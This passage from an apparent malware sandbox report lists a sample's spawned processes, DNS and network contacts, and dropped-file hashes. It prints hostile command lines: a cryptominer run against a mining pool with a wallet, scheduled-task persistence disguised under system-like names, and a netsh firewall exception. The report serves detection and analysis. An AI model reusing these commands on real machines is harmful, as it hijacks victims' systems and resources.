| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\li4.exe
"C:\Users\Admin\AppData\Local\Temp\li4.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 4076
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4076 -s 800
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 4644
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4644 -s 800
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| NL | 104.110.191.140:80 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| NL | 13.69.109.130:443 | tcp | |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| GB | 92.123.143.240:80 | tcp | |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
memory/2008-130-0x0000000000000000-mapping.dmp
memory/3004-133-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/4708-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
memory/4920-140-0x0000000000000000-mapping.dmp
memory/2172-139-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/1040-145-0x0000000000000000-mapping.dmp
memory/2172-148-0x00000000005F0000-0x0000000000C80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/1040-149-0x00000000007A0000-0x0000000000856000-memory.dmp
memory/1040-150-0x00000000053C0000-0x000000000545C000-memory.dmp
memory/2172-151-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp
memory/2128-153-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2128-152-0x0000000000000000-mapping.dmp
memory/1040-154-0x0000000005A10000-0x0000000005FB4000-memory.dmp
memory/1040-156-0x0000000005500000-0x0000000005592000-memory.dmp
memory/408-159-0x0000000000000000-mapping.dmp
memory/408-160-0x0000000000400000-0x000000000044C000-memory.dmp
memory/3784-162-0x0000000000000000-mapping.dmp
memory/1040-163-0x00000000051A0000-0x00000000051AA000-memory.dmp
memory/1040-168-0x00000000055A0000-0x00000000055F6000-memory.dmp
memory/3756-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
| MD5 | 222f649af364623037bda8ee9df02945 |
| SHA1 | f5e1ecb12628b69eeb29ab47d64283122316bd5e |
| SHA256 | 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30 |
| SHA512 | c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64 |
memory/408-178-0x0000000000400000-0x000000000044C000-memory.dmp
memory/408-176-0x0000000000400000-0x000000000044C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
| MD5 | 222f649af364623037bda8ee9df02945 |
| SHA1 | f5e1ecb12628b69eeb29ab47d64283122316bd5e |
| SHA256 | 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30 |
| SHA512 | c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64 |
memory/1668-173-0x0000000000000000-mapping.dmp
memory/2064-181-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2064-180-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/5104-186-0x0000000000000000-mapping.dmp
memory/2064-188-0x000000006EB30000-0x000000006F0E1000-memory.dmp
memory/5104-192-0x0000000010410000-0x0000000010471000-memory.dmp
memory/408-189-0x0000000010410000-0x0000000010471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XX--XX--XX.txt
| MD5 | 06c726690de1e0bf2ee467d6da373c60 |
| SHA1 | f98af670a712cfc223c444d6beb0803642054260 |
| SHA256 | d884fb142b4dd02afc9e7a903cd5ef618d39525b31ff35edbaa79a4e768738fc |
| SHA512 | 90716d4b014333d9eefb86576d29c5ee45aaa7e20cc3266e82860c084d8fda17611d08b05ccc23f0e16affe73ab6dd209a446cfa805fbb3c5ecf95fe7b5f418e |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/4272-194-0x0000000000000000-mapping.dmp
memory/5104-196-0x0000000010410000-0x0000000010471000-memory.dmp
memory/4476-197-0x0000000000000000-mapping.dmp
memory/3720-199-0x0000000000000000-mapping.dmp
memory/824-198-0x0000000000000000-mapping.dmp
memory/2604-201-0x0000000000400000-0x000000000040C000-memory.dmp
memory/2604-200-0x0000000000000000-mapping.dmp
memory/2128-206-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/2604-207-0x000000006EB30000-0x000000006F0E1000-memory.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/4076-212-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2124-216-0x0000000000580000-0x000000000058C000-memory.dmp
memory/568-221-0x0000000001400000-0x000000000144C000-memory.dmp
memory/568-220-0x0000000000000000-mapping.dmp
memory/568-233-0x0000000001400000-0x000000000144C000-memory.dmp
memory/568-232-0x0000000001400000-0x000000000144C000-memory.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2124-215-0x0000000000000000-mapping.dmp
memory/3784-235-0x0000000000000000-mapping.dmp
memory/3480-234-0x0000000000000000-mapping.dmp
memory/4560-237-0x0000000000000000-mapping.dmp
memory/4056-236-0x0000000000000000-mapping.dmp
memory/608-238-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | 6efec1ae1365a1aa84d3c030b9a8ff39 |
| SHA1 | 7391ea75580e1353d7f4e089ed04723533c64601 |
| SHA256 | 86e0339e72c99d4913f0f19476d8798b86404630fa73f259d3cd6ff75a4a50cf |
| SHA512 | 5ceb1f0cdbbd8a22043866b3e445684b6224d628f37560271ba59bd5b2e68c2a71207eca9998993bef4ea24e2d03e79e883eb7f05afb8dbb919e0869716dbfcd |
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | 4d9b81630965b6fedc6a74f17640a091 |
| SHA1 | dc82f73f7fe5dd559b1dbbf8eb359b0e0193f1f6 |
| SHA256 | 46aacf7129aff614e9ba2e2ddc345d02bc5c88ca58904dc74d5aac149fda7f61 |
| SHA512 | 617dd1b67a135a1a295f8cea2d28ac6c7c6016a5fe1a8a2517423bae475a175622c3d4f3c5f564de78cc2110b8c969d2ab18b11ae010a25d3fd41185c7c8e0ff |
memory/408-241-0x0000000000000000-mapping.dmp
memory/408-246-0x000000006EB30000-0x000000006F0E1000-memory.dmp
memory/384-247-0x0000000000000000-mapping.dmp
memory/556-248-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
| MD5 | 9f893d94b017a0684012d50319c9ffbe |
| SHA1 | 140cc2cb6b2520ba4f9a1f666a5f679853472793 |
| SHA256 | 8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec |
| SHA512 | 4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 8e42b462d64f31e8f8b90f121a873b39 |
| SHA1 | 7debe9f369937f1d17a8bb9e813b912b0ada1ead |
| SHA256 | 05be1d1b144d3b044d98eb75acabc7b688d4b5d3535ed340afa0e97f9bca4112 |
| SHA512 | 61fc2e12e86677bb202e10999ade1299df1c93b3048577aee5a087ec37e6fb675443f5b4afa51d900ce7db3d9c94fcb02822215d7b613d4004e155dddf429329 |
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
memory/4764-252-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
| MD5 | 657f403a19497b80aefa11dfb75f4600 |
| SHA1 | c2c296140be72560a9602b8e918133f7991f65b3 |
| SHA256 | 415830b94630e82b4460b4ff755a3049cb5558f30a5660d6923f61f3af7cd53c |
| SHA512 | 346e28c3fbd3e92b8b9a4ececeb45278bff97091e45c3519a42b7348cb826840a131d35db77b11e7537fab6bbc8da3eb8a99eae31168812ca45f20f1eebcfe04 |
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | c9d867ee51bbdedf69adf18c62657d09 |
| SHA1 | 357975b6b94eba762375c2b5ac96083973ccc22f |
